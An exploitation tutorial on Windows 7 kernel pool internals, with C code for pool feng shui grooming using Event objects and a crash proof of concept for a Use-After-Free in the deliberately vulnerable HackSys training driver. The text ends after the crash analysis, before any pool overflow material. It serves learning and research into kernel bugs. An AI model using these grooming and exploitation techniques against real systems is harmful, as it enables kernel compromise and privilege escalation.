Windows Kernel Exploitation Part 4: Introduction to Windows Kernel Pool Exploitation

In this post I'm going to cover exploiting the Use-After-Free and Pool Overflow issues in the HackSys Team Extremely Vulnerable Driver. However, in order to explain this properly, an understanding of Windows kernel memory management is needed. As such, this post will cover the following:

  1. An overview of Windows kernel memory allocation
  2. A walkthrough on Windows kernel pool Fengshui
  3. Exploiting the HackSys Team Extremely Vulnerable Driver Use-After-Free
  4. Exploiting the HackSys Team Extremely Vulnerable Driver Pool overflow via two different methods

As with the previous examples, this post is focused on 32-bit Windows 7 Service Pack 1.

Windows Kernel Pools

Some basic knowledge of how memory management works will be helpful here. If you've never looked at Virtual Memory and Paging before, it's worth giving the following a quick read:

  1. Anatomy of a Program in Memory
  2. How the Kernel Manages Your Memory

The Windows kernel uses two types of dynamically sized 'pools' to allocate system memory; these are the kernel's equivalent of the Heap in User Mode. I'm only going to cover enough detail to understand how the exploits later on work. For more info check out:

  1. Kernel Pool Exploitation on Windows 7 by Tarjei Mandt
  2. Windows Internals Seventh Edition Part 1 Chapter 5 or Windows Internals Sixth Edition Part 2 Chapter 10 Memory Management
  3. Memory Management for Windows Drivers

On Windows there are two key types of pool: the Nonpaged pool and the Paged pool. There's also the Special pool, which I'll cover while walking through the Use-After-Free exploit, and the Session pool, which is used by win32k and won't be covered here.

Paged vs Non-Paged Pools

The Nonpaged pool is made up of memory which is guaranteed to always be stored in physical memory, whereas memory allocated within the Paged pool can be paged out. This is required because some kernel structures need to be accessible at IRQLs higher than that at which page faults can be satisfied. More details on IRQLs and what actions are supported at each level can be found at Managing Hardware Priorities.

This means that the Nonpaged pool is used to store key control structures such as Processes, Threads, Semaphores etc. Meanwhile the Paged pool is used to store file mappings, object handles, etc. The Paged pool actually consists of several separate pools, whereas at least on Windows 7, there is only one Nonpaged pool.

In order to allocate pool memory, drivers and the kernel will generally use the ExAllocatePoolWithTag function, the definition of which is shown below.

PVOID ExAllocatePoolWithTag(
  _In_ POOL_TYPE PoolType,
  _In_ SIZE_T    NumberOfBytes,
  _In_ ULONG     Tag
);

The PoolType argument takes a value from the POOL_TYPE enum, which defines exactly what type of pool memory is being requested. We'll mostly be seeing it called with 0, which corresponds to the Nonpaged pool.

typedef enum _POOL_TYPE { 
  NonPagedPool,
  NonPagedPoolExecute                   = NonPagedPool,
  PagedPool,
  NonPagedPoolMustSucceed               = NonPagedPool + 2,
  DontUseThisType,
  NonPagedPoolCacheAligned              = NonPagedPool + 4,
  PagedPoolCacheAligned,
  NonPagedPoolCacheAlignedMustS         = NonPagedPool + 6,
  MaxPoolType,
  NonPagedPoolBase                      = 0,
  NonPagedPoolBaseMustSucceed           = NonPagedPoolBase + 2,
  NonPagedPoolBaseCacheAligned          = NonPagedPoolBase + 4,
  NonPagedPoolBaseCacheAlignedMustS     = NonPagedPoolBase + 6,
  NonPagedPoolSession                   = 32,
  PagedPoolSession                      = NonPagedPoolSession + 1,
  NonPagedPoolMustSucceedSession        = PagedPoolSession + 1,
  DontUseThisTypeSession                = NonPagedPoolMustSucceedSession + 1,
  NonPagedPoolCacheAlignedSession       = DontUseThisTypeSession + 1,
  PagedPoolCacheAlignedSession          = NonPagedPoolCacheAlignedSession + 1,
  NonPagedPoolCacheAlignedMustSSession  = PagedPoolCacheAlignedSession + 1,
  NonPagedPoolNx                        = 512,
  NonPagedPoolNxCacheAligned            = NonPagedPoolNx + 4,
  NonPagedPoolSessionNx                 = NonPagedPoolNx + 32
} POOL_TYPE;

The second argument is the number of bytes of pool memory required. Finally, the Tag argument is a 32-bit value which is generally treated as 4 characters used to tag what the memory is used for. This is super handy when debugging and is also used by a lot of kernel memory instrumentation: tracking how many allocations have been made with a certain tag, breaking when memory is allocated with a certain tag, etc.

To free allocated pool memory the ExFreePoolWithTag function is generally used.

VOID ExFreePoolWithTag(
  _In_ PVOID P,
  _In_ ULONG Tag
);

This just requires a pointer to a valid pool allocation and the pool metadata will give it everything else needed. Under standard conditions the pool tag provided won't be validated; however, with the right debugging settings enabled the tags will be validated and a BSOD will be triggered if they don't match. Now let's look into how these functions work under the hood.

Allocating Memory

At first look in a disassembler, ExAllocatePoolWithTag is pretty intimidating.

Luckily Tarjei Mandt already did the work of turning the function into pseudo code in his paper, which acts as a nice guide. I'm going to use his pseudo code, plus some checking in IDA and WinDbg, to explain how the function works. His explanation is probably better and more accurate though; all the code snippets in this section are from the paper.

First of all the function checks if the number of bytes requested is over 4080 bytes (0xff0) and calls the Big Pool allocator if so.

// call pool page allocator if size is above 4080 bytes
if (NumberOfBytes > 0xff0) {  
// call nt!ExpAllocateBigPool
}

Here esi contains the requested number of bytes; if it's above 0xff0 execution goes to nt!ExpAllocateBigPool. Otherwise the true branch is taken and processing continues.

if (PoolType & PagedPool) {  
    if (PoolType & SessionPool && BlockSize <= 0x19) {
        // try the session paged lookaside list
        // return on success
    } else if (BlockSize <= 0x20) {
        // try the per-processor paged lookaside list
        // return on success
    }
    // lock paged pool descriptor (round robin or local node)
}

At this point [esp+48h+var_20] holds the PoolType ANDed with 1. If the value is 0 the request is for Nonpaged pool memory, so the if statement above is skipped and execution goes to the else branch shown in a minute. If the request is for Paged pool memory, the true branch is taken.

On the true branch it checks if the pool type is for the session pool.

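It then immediately checks if the requested block size is above the lookaside limit.

Meanwhile on the false branch it also checks if the block size is above 0x20 (32) blocks. Block sizes are counted in 8-byte units, so this is 256 bytes rather than 32 bytes.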

If either check is passed the logic gets a bit hairy, so I'll only give a brief overview; Tarjei's paper has more detail. The function will attempt to allocate the requested block by finding an entry on the Lookaside list for the relevant pool. The Lookaside lists are per-processor structures for each pool, and a reference to them is stored in the Kernel Processor Control Block. They consist of singly linked lists of commonly requested memory sizes; for general pool memory these are small allocations that will be made frequently. Using the Lookaside lists allows these frequent allocations to be made more rapidly. Other, more specific lookaside lists exist for very frequently made fixed-size allocations.

If neither of the size checks was passed, or allocating memory from the lookaside lists failed, the paged pool descriptor is locked. This is the same structure as used for the Nonpaged pool and is used in the same way, so I'll describe it later.

Now we have the code which is run if the requested allocation is of a Nonpaged pool type; here we took the false branch at loc_518175 above.

else { // NonPagedPool  
    if (BlockSize <= 0x20) {
        // try the per-processor non-paged lookaside list
        // return on success
    }
    // lock non-paged pool descriptor (local node)
}

Next the code will check whether the requested block size is less than or equal to 0x20 (32 blocks of 8 bytes), as shown below. As above, if the allocation is small enough it will attempt to use the lookaside list, returning if successful.

If the lookaside list cannot be used or the requested block size is greater than 0x20, the Nonpaged pool descriptor will be locked. First a pointer to the Nonpaged pool descriptor is retrieved; if there's more than one Nonpaged pool a lookup will be done.

First the index into the ExpNonPagedPoolDescriptor table will be calculated based on the number of Nonpaged pools available and the 'local node' (the paper explains this but basically each processor in a multi core system can have preferred local memory for performance reasons):
Here eax ends up holding the chosen index. Then a reference will be read from the table:

This is the same logic as for Paged pools, calculating the index and then getting a reference:
At this point the code paths for both paged and nonpaged allocations have reached the same point. The allocator will check if the pool descriptor is locked and acquire a lock if not.

Now what does the descriptor structure actually consist of? Luckily it's included in the public symbols for Windows 7.

dt nt!_POOL_DESCRIPTOR  
   +0x000 PoolType         : _POOL_TYPE
   +0x004 PagedLock        : _KGUARDED_MUTEX
   +0x004 NonPagedLock     : Uint4B
   +0x040 RunningAllocs    : Int4B
   +0x044 RunningDeAllocs  : Int4B
   +0x048 TotalBigPages    : Int4B
   +0x04c ThreadsProcessingDeferrals : Int4B
   +0x050 TotalBytes       : Uint4B
   +0x080 PoolIndex        : Uint4B
   +0x0c0 TotalPages       : Int4B
   +0x100 PendingFrees     : Ptr32 Ptr32 Void
   +0x104 PendingFreeDepth : Int4B
   +0x140 ListHeads        : [512] _LIST_ENTRY

The (Non)PagedLock field is what we just saw being checked before the function acquired a lock on the descriptor. The PoolType is self explanatory, and the PoolIndex field indicates which entry in the kernel's ExpPagedPoolDescriptor or ExpNonPagedPoolDescriptor tables holds a pointer to the structure. The only other fields we really care about are PendingFrees and PendingFreeDepth, which I'll explain in the next section, and ListHeads, which we need to look at now.

ListHeads is an array of lists of free blocks of memory, one list per block size, in multiples of 8 bytes up to a large allocation. Each entry is a LIST_ENTRY structure which heads a linked list of free blocks of the same size. The array is indexed by the block size: the requested size plus 8 bytes (to make room for the POOL_HEADER, described in a second), divided by 8 and rounded up to give a count of 8-byte blocks. The allocator will go through the array starting at the entry of the exact size needed, looking for a valid chunk to use; if it can't find an exact fit, it looks for a larger entry and splits it. The pseudo code for this is below, again stolen from Tarjei Mandt's paper.

// attempt to use listheads lists
for (n = BlockSize-1; n < 512; n++) {  
    if (ListHeads[n].Flink == &ListHeads[n]) { // empty
        continue; // try next block size
    }
    // safe unlink ListHeads[n].Flink
    // split if larger than needed
    // return chunk
}

I gave up following the assembly properly at this point - it gets a bit mental and I'm not sure it'd add much (also this blogpost just topped 10k words...). However we could do with a bit more detail on what happens when the function actually successfully finds a chunk of memory that's of a correct size. Allocations made by the allocator are for the requested amount + 8 bytes, to make room for the POOL_HEADER mentioned previously. The structure is included in Windows 7's public symbols, so we can see it below.

dt nt!_POOL_HEADER  
   +0x000 PreviousSize     : Pos 0, 9 Bits
   +0x000 PoolIndex        : Pos 9, 7 Bits
   +0x002 BlockSize        : Pos 0, 9 Bits
   +0x002 PoolType         : Pos 9, 7 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x004 AllocatorBackTraceIndex : Uint2B
   +0x006 PoolTagHash      : Uint2B

The PreviousSize field is the size of the previous allocation in memory; this is used when freeing allocations to check for corruption. The PoolIndex field can be used to look up the POOL_DESCRIPTOR for the allocation, as explained earlier. The BlockSize is the total size of the allocation, including the header, and finally the PoolType is just the value from the POOL_TYPE enum it was allocated with, ORed with 2 if the block is not free. The PoolTag is self explanatory.

Finally if the function failed to find space for the allocation in already allocated memory pages it will call MiAllocatePoolPages to create some more and return an address within the new memory.

// no chunk found, call nt!MiAllocatePoolPages
// split page and return chunk

As can be seen below.

Freeing Memory

This time I've just provided some comments on Tarjei Mandt's reversed code. I'm not sure the assembly snippets add much, but I'm happy to add them if they'd actually be useful. This section only covers the components relevant to the exploits; see the paper for all the code and details.

The BlockSize should be equal to the PreviousSize field in the next pool object's header; if it isn't then memory has been corrupted and a BugCheck is triggered. When overwriting this structure we need to make sure the BlockSize is overwritten with the correct value or we'll get Blue Screens.

if (Entry->BlockSize != NextEntry->PreviousSize)  
    BugCheckEx(BAD_POOL_HEADER);

Then the pool type is checked; I've skipped the Session part.

else if (Entry->BlockSize <= 0x20) {
    if (Entry->PoolType & PagedPool) {
        // put in per-processor paged lookaside list
        // return on success
    } else { // NonPagedPool
        // put in per-processor non-paged lookaside list
        // return on success
    }
}

If delayed frees are enabled, the function checks whether the pending list has >= 32 entries; if so it frees them all, and then adds the current entry to the list.

if (ExpPoolFlags & DELAY_FREE) { // 0x200
    if (PendingFreeDepth >= 0x20) {
        // call nt!ExDeferredFreePool
    }
    // add Entry to PendingFrees list
}

We'll only be looking at systems with deferred frees enabled, so I'll skip the old merge logic. The logic in ExDeferredFreePool is fairly straightforward at a high level and the function is defined as below.

VOID ExDeferredFreePool( PPOOL_DESCRIPTOR PoolDesc, BOOLEAN bMultipleThreads)  

It takes in a pointer to the POOL_DESCRIPTOR which was locked by ExFreePoolWithTag earlier. It then loops through PendingFrees and frees each entry; if the next or previous entries are free then they'll be coalesced with the block currently being free'd.

Windows Kernel Pool Fengshui

In order to carry out kernel pool fengshui we need to allocate objects within the correct type of pool which are of sizes that are useful to us. We know that key kernel data structures like Semaphores are stored in the Nonpaged pool, which is also used by the HackSys driver for all the pool based challenges. To start off with we need to find some kernel structures which will be allocated within the Nonpaged pool, and their sizes. The easy way to do this is to allocate some control objects and then use a kernel debugger to view the corresponding pool allocations. I used the following code to do this.

#include "stdafx.h"
#include <Windows.h>

//from https://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html
typedef struct _UNICODE_STRING  
{
    WORD Length;
    WORD MaximumLength;
    WORD * Buffer;
} UNICODE_STRING, *PUNICODE_STRING;


//from https://www.nirsoft.net/kernel_struct/vista/OBJECT_ATTRIBUTES.html
typedef struct _OBJECT_ATTRIBUTES  
{
    ULONG Length;
    PVOID RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

//from https://github.com/JeremyFetiveau/Exploits/blob/master/MS10-058.cpp
#define IOCO 1
typedef NTSTATUS(__stdcall *NtAllocateReserveObject_t) (OUT PHANDLE hObject, IN POBJECT_ATTRIBUTES ObjectAttributes, IN DWORD ObjectType);

int main()  
{
    HMODULE hModule = LoadLibraryA("ntdll.dll");

    if (hModule == NULL) {
        printf("Couldn't load ntdll, how is computer running? : 0x%X\n", GetLastError());
        return 1;
    }

    NtAllocateReserveObject_t NtAllocateReserveObject = (NtAllocateReserveObject_t)GetProcAddress(hModule, "NtAllocateReserveObject");

    if (NtAllocateReserveObject == NULL) {
        printf("Couldn't get a reference to NtAllocateReserveObject in ntdll?!: 0x%X\n", GetLastError());
        return 1;
    }

    printf("NonPaged Pool objects:\r\n");
    HANDLE reserve = NULL;
    NtAllocateReserveObject(&reserve,0,IOCO);
    printf("\tReserve object: 0x%x\r\n", reserve);
    HANDLE event = CreateEvent(NULL, false, false, TEXT(""));
    printf("\tEvent object: 0x%x\r\n", event);
    HANDLE semaphore = CreateSemaphore(NULL, 0, 1, TEXT(""));
    printf("\tSemaphore object: 0x%x\r\n", semaphore);
    HANDLE mutex = CreateMutex(NULL, false, TEXT(""));
    printf("\tMutex object: 0x%x\r\n", mutex);
    getchar();
    DebugBreak();
    return 0;
}

Compiling and running this code gives the following output, then after hitting enter our attached kernel debugger should break.

Using the debugger we can find out where each structure resides in memory and how much memory is allocated for it. In windbg the !handle command can be entered to get the details for an object. Here I'm retrieving the Reserve object's details.

!handle 0x20
...
0020: Object: 85edb3c0  GrantedAccess: 000f0003 Entry: 86322040  
Object: 85edb3c0  Type: (843e3d20) IoCompletionReserve  
    ObjectHeader: 85edb3a8 (new version)
        HandleCount: 1  PointerCount: 1

Once we know the object's address we can look up its pool details using the !pool command. Passing 2 as its second argument means it only shows the exact allocation we're interested in; removing the 2 will show us the surrounding allocations within the page of memory.

kd> !pool 85edb3c0 2  
Pool page 85edb3c0 region is Nonpaged pool  
*85edb390 size:   60 previous size:   30  (Allocated) *IoCo (Protected)
        Owning component : Unknown (update pooltag.txt)

Here we can see that the Reserve object is allocated with a tag of 'IoCo' and takes up 0x60 bytes. Repeating this process for the other objects gives us the following.

Event:  
*8458e540 size:   40 previous size:   b8  (Allocated) *Even (Protected)

Semaphore:
*86107538 size:   48 previous size:   10  (Allocated) *Sema (Protected)

Mutex:  
*84de7b48 size:   50 previous size:   50  (Allocated) *Muta (Protected)

Knowing the object sizes will be useful later when we need to ensure that a target object of a set size is reliably allocated in a gap in memory we've created. For now let's try to carry out pool grooming using Event objects, which will give us a pattern of free and allocated 0x40 byte pool blocks.

Since the allocator will allocate memory for objects by looking for free blocks before starting to allocate them on free pages, we need to start by filling up the existing 0x40 byte free blocks.

For example the below code will allocate five event objects.

#include "stdafx.h"
#include <Windows.h>

#define DEFRAG_EVENT_COUNT 5

int main()  
{

    HANDLE hDefragEvents[DEFRAG_EVENT_COUNT] = {0x0};
    for (unsigned int i = 0; i < DEFRAG_EVENT_COUNT; i++) {
        HANDLE hEvent = CreateEvent(NULL, false, false, TEXT(""));
        if (hEvent == NULL) {
            printf("Failed to create defrag event 0x%X: 0x%X\r\n", i, GetLastError());
            return 1;
        }
        hDefragEvents[i] = hEvent;
    }
    printf("Last 5 Event handles:\r\n");
    for (unsigned int i = 0; i < 5; i++) {
        // count back from the final element; DEFRAG_EVENT_COUNT itself is out of bounds
        unsigned int index = DEFRAG_EVENT_COUNT - 1 - i;
        printf("\t Event handle %u: 0x%X\r\n", index, hDefragEvents[index]);
    }
    DebugBreak();
    for (unsigned int i = 0; i < DEFRAG_EVENT_COUNT; i++) {
        HANDLE hEvent = hDefragEvents[i];
        if (!CloseHandle(hEvent)) {
            printf("Failed to remove defrag event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
            return 1;
        }
    }

    return 0;
}

Now if we build this code and run it with a kernel debugger attached, we can see the handles for the five event objects.

Examining the last two handles in windbg shows us that they are not allocated anywhere near each other.

!handle 0x34
...
0034: Object: 85d44de8  GrantedAccess: 001f0003 Entry: a9635068  
Object: 85d44de8  Type: (841bd440) Event  
    ObjectHeader: 85d44dd0 (new version)
        HandleCount: 1  PointerCount: 1


!handle 0x30
...
0030: Object: 84d32ee0  GrantedAccess: 001f0003 Entry: a9635060  
Object: 84d32ee0  Type: (841bd440) Event  
    ObjectHeader: 84d32ec8 (new version)
        HandleCount: 1  PointerCount: 1

Further viewing the pool information for the page on which the penultimate Event object was allocated, shows that it is just placed in the first available gap between two random objects.

kd> !pool 84d32ee0  
...
 84d32d98 size:   38 previous size:   40  (Allocated)  ViMm
 84d32dd0 size:   90 previous size:   38  (Allocated)  Ntfx
 84d32e60 size:   10 previous size:   90  (Free)       CcBc
 84d32e70 size:   40 previous size:   10  (Allocated)  Even (Protected)
*84d32eb0 size:   40 previous size:   40  (Allocated) *Even (Protected)
        Pooltag Even : Event objects
 84d32ef0 size:   18 previous size:   40  (Allocated)  AzBD
 84d32f08 size:   28 previous size:   18  (Allocated)  VadS
 84d32f30 size:   68 previous size:   28  (Allocated)  FMsl
 84d32f98 size:   28 previous size:   68  (Allocated)  VadS
 84d32fc0 size:   40 previous size:   28  (Allocated)  Even (Protected)

However if we increase DEFRAG_EVENT_COUNT to a much larger number, we get a very different story.

#define DEFRAG_EVENT_COUNT 20000

Again running it and viewing the last five handles.

Examining the handles in windbg we can see that they have been allocated contiguously in memory.

!handle 13930
...
13930: Object: 85c50a00  GrantedAccess: 001f0003 Entry: a6cc5260  
Object: 85c50a00  Type: (841bd440) Event  
    ObjectHeader: 85c509e8 (new version)
        HandleCount: 1  PointerCount: 1

!handle 1392c
...
1392c: Object: 85c50a40  GrantedAccess: 001f0003 Entry: a6cc5258  
Object: 85c50a40  Type: (841bd440) Event  
    ObjectHeader: 85c50a28 (new version)
        HandleCount: 1  PointerCount: 1

Examining the pool layout for the page both Event objects are allocated on, shows a long series of Event objects allocated contiguously. The deterministic nature of the memory allocator means that this will always happen eventually, if we allocate enough Event objects.

!pool 85c50a40
...
 85c509d0 size:   40 previous size:   40  (Allocated)  Even (Protected)
*85c50a10 size:   40 previous size:   40  (Allocated) *Even (Protected)
        Pooltag Even : Event objects
 85c50a50 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50a90 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50ad0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50b10 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50b50 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50b90 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50bd0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50c10 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50c50 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50c90 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50cd0 size:   40 previous size:   40  (Allocated)  Even (Protected)
...

Now we want to create 'holes' of a controlled size in the address space. At this point we know any further Event objects will be allocated mostly contiguously, so by allocating a large number and then freeing every other object we should get a pattern of free and allocated objects.

I added the following code to the defragmentation example above, in place of the loop that printed the last five handles.

HANDLE hGroomEvents[5000] = { 0x00 };

for (unsigned int i = 0; i < 5000; i++) {  
    HANDLE hEvent = CreateEvent(NULL, false, false, TEXT(""));
    if (hEvent == NULL) {
        printf("Failed to create groom event 0x%X: 0x%X\r\n", i, GetLastError());
        return 1;
    }
    hGroomEvents[i] = hEvent;
}

for (unsigned int i = 0; i < 5000; i+=2) {  
    HANDLE hEvent = hGroomEvents[i];
    if (!CloseHandle(hEvent)) {
        printf("Failed to remove groom event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
        return 1;
    }
}
printf("Example Event handle: 0x%X\r\n", hGroomEvents[4443]);  
getchar();  
DebugBreak();  
for (unsigned int i = 1; i < 5000; i += 2) {  
    HANDLE hEvent = hGroomEvents[i];
    if (!CloseHandle(hEvent)) {
        printf("Failed to remove groom event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
        return 1;
    }
}

Running it we get an example handle printed out from a vaguely random index into the remaining handles.

Examining the handle in windbg allows us to find its address in memory.

!handle 17ecc
...
17ecc: Object: 85d3ba30  GrantedAccess: 001f0003 Entry: 87e88d98  
Object: 85d3ba30  Type: (841bd440) Event  
    ObjectHeader: 85d3ba18 (new version)
        HandleCount: 1  PointerCount: 1

Once we know the allocation's address, we can again view the pool layout of the page it is allocated on. Here we can see that we've successfully created a pattern of free and allocated Event objects.

!pool 85d3ba30  
...
 85d3b7c0 size:   40 previous size:   40  (Free)       Even
 85d3b800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3b840 size:   40 previous size:   40  (Free)       Even
 85d3b880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3b8c0 size:   40 previous size:   40  (Free)       Even
 85d3b900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3b940 size:   40 previous size:   40  (Free)       Even
 85d3b980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3b9c0 size:   40 previous size:   40  (Free)       Even
*85d3ba00 size:   40 previous size:   40  (Allocated) *Even (Protected)
        Pooltag Even : Event objects
 85d3ba40 size:   40 previous size:   40  (Free)       Even
 85d3ba80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bac0 size:   40 previous size:   40  (Free)       Even
 85d3bb00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bb40 size:   40 previous size:   40  (Free)       Even
 85d3bb80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bbc0 size:   40 previous size:   40  (Free)       Even
 85d3bc00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bc40 size:   40 previous size:   40  (Free)       Even
 85d3bc80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bcc0 size:   40 previous size:   40  (Free)       Even
 85d3bd00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bd40 size:   40 previous size:   40  (Free)       Even
 85d3bd80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bdc0 size:   40 previous size:   40  (Free)       Even
 85d3be00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3be40 size:   40 previous size:   40  (Free)       Even
...

For objects/allocations where we can't find a kernel object of the same size, we can use multiple copies of an object whose size divides evenly into the target size, or attempt something more elaborate.

HackSysTeam Extremely Vulnerable Driver Use-After-Free Exploitation

A Use-After-Free (UAF) vulnerability occurs when (shockingly) memory is used after it has already been free'd. By finding somewhere where code does this, it may be possible to replace the free'd memory with something else. Then when the memory is referenced and the code thinks one structure/object is there, another is. By placing the right new data where the free memory is, code execution can be gained.

The Vulnerability

As I just explained, in order to exploit a UAF we need the following:

  1. A way to create an object
  2. A way to free the object
  3. A way to replace it
  4. A way to cause the replacement to be referenced as if it was the original

As before, a brief look at the driver in IDA shows us all our needs are provided for. I'll start by covering points 1, 2 and 4 as they'll let us develop a crash PoC. First off we need a way to create an object in kernel memory using the driver. Looking at the IOCTL dispatch function shows us a function call preceded by logging the following string: ****** HACKSYS_EVD_IOCTL_CREATE_UAF_OBJECT ******. This sounds like it'll be what we're looking for.

Taking a look at the function itself, we see that it allocates 0x58 bytes of memory on the Nonpaged pool.

If this allocation is successful it goes on to load values into the memory and save a reference to it in a global variable.

At 1 the function fills all of the allocated memory with 0x41 bytes. It then loads a 0 byte into the last byte of the memory. The function pointer loaded into the first four bytes of the object at 3 is a simple function which logs that it has been called.

Finally at 4 the driver saves a pointer to the memory in the global variable named P.

Now we can create the object, we need a way to free it. The function call in the IOCTL dispatch function preceded by logging ****** HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT ****** is probably a good call.

Looking at the function itself we can see it doesn't take any input, instead operating on the reference stored by the last function we looked at.

Once called the function checks that the global pointer 'P' referenced in the create function isn't null at 1 before proceeding to call ExFreePoolWithTag on it at 2.

Onto our final requirement, a way to make the driver reference the free'd object in some way. Luckily ****** HACKSYS_EVD_IOCTL_USE_UAF_OBJECT ****** sounds like it'll do the trick.

Looking at the function we can see that it attempts to call the function pointer loaded into the first four bytes of the UAF object by the create function.

Here at 1, it's making sure that P contains a pointer to an object and isn't a null pointer. It then loads the first four bytes of memory into eax and makes sure they aren't null bytes at 2. If both these checks were successful then the callback is called at 3.

Working these out gives us the three IOCTL codes we need.

#define HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT             CTL_CODE(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define HACKSYS_EVD_IOCTL_USE_UAF_OBJECT                  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT                 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x806, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

Developing a crash PoC

In order to reliably detect that a UAF has occurred, I used some of the Windows kernel's pool debugging functionality, in this case enabling special pool for the HackSysExtremeVulnerableDriver using the command shown below.

verifier /volatile /flags 0x1 /adddriver HackSysExtremeVulnerableDriver.sys  

If this has run successfully we should see the following output.

When a binary with special pool enabled calls the ExAllocatePoolWithTag function, it will use the ExAllocatePoolWithTagSpecialPool function to allocate memory instead of following its standard logic, as shown below.

The ExFreePoolWithTag function has matching logic. Special pool works by being a literal separate memory pool backed by separate pages of memory. There are a few different options for special pool, as explained here. By default it is in verify end mode, which in brief means that all allocations made by the driver are placed as close to the end of a page of memory as possible and the following and previous pages are marked as inaccessible. This means that if the driver attempts to access memory beyond the end of the allocation an error will be triggered. Additionally the unused memory on the page is marked with special patterns, so that if these are corrupted the error can be detected when the memory is free'd.

Additionally special pool will mark memory it has free'd and avoid reallocating it for as long as possible. If the free'd memory is referenced it will trigger an error. This causes a huge performance impact for the driver, so it's only enabled when debugging memory issues.

With special pool enabled, we can create a simple crash proof of concept for the vulnerability. The below code will create the UAF object, free it and then cause it to be referenced. If the driver does reference the free'd memory this should trigger a blue screen due to special pool's debugging features.

#include "stdafx.h"
#include <Windows.h>

#define HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT             CTL_CODE(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define HACKSYS_EVD_IOCTL_USE_UAF_OBJECT                  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT                 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x806, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

int _tmain(int argc, _TCHAR* argv[])  
{
    DWORD dwBytesReturned;
    LPCWSTR lpDeviceName = TEXT("\\\\.\\HackSysExtremeVulnerableDriver");

    printf("Getting the device handle\r\n");
    //HANDLE WINAPI CreateFile( _In_ lpFileName, _In_ dwDesiredAccess, _In_ dwShareMode, _In_opt_ lpSecurityAttributes,
    //_In_ dwCreationDisposition, _In_ dwFlagsAndAttributes, _In_opt_ hTemplateFile );
    HANDLE hDriver = CreateFile(lpDeviceName,           //File name - in this case our device name
        GENERIC_READ | GENERIC_WRITE,                   //dwDesiredAccess - type of access to the file, can be read, write, both or neither. We want read and write because that's the permission the driver declares we need.
        FILE_SHARE_READ | FILE_SHARE_WRITE,             //dwShareMode - other processes can read and write to the driver while we're using it but not delete it - FILE_SHARE_DELETE would enable this.
        NULL,                                           //lpSecurityAttributes - Optional, security descriptor for the returned handle and declares whether inheriting processes can access it - unneeded for us.
        OPEN_EXISTING,                                  //dwCreationDisposition - what to do if the file/device doesn't exist, in this case only opens it if it already exists, returning an error if it doesn't.
        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,   //dwFlagsAndAttributes - In this case the FILE_ATTRIBUTE_NORMAL means that the device has no special file attributes and FILE_FLAG_OVERLAPPED means that the device is being opened for async IO.
        NULL);                                          //hTemplateFile - Optional, only used when creating a new file - takes a handle to a template file which defines various attributes for the file being created.

    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("Failed to get device handle :( 0x%X\r\n", GetLastError());
        return 1;
    }

    printf("Got the device Handle: 0x%X\r\n", hDriver);
    DeviceIoControl(hDriver, HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT, NULL, 0, NULL, 0, &dwBytesReturned, NULL);

    printf("UAF object created.\r\n");

    DeviceIoControl(hDriver, HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT, NULL, 0, NULL, 0, &dwBytesReturned, NULL);

    printf("UAF object free'd.\r\n");

    DeviceIoControl(hDriver, HACKSYS_EVD_IOCTL_USE_UAF_OBJECT, NULL, 0, NULL, 0, &dwBytesReturned, NULL);

    printf("UAF object used.\r\n");
    printf("Exploit complete, cleaning up\n");
    CloseHandle(hDriver);
    return 0;
}

Now compile and run it and...

Rebooting the system with a kernel debugger attached, re-enabling special pool and re-running the PoC allows us to check the crash was caused by the free'd memory being referenced.

The !analyze -v output immediately tells us that the crash is likely due to free'd memory being referenced. Looking further into the output we can see that the crashing instruction is the push [eax] instruction seen earlier in the IOCTL handler which calls the UAF object's callback function.

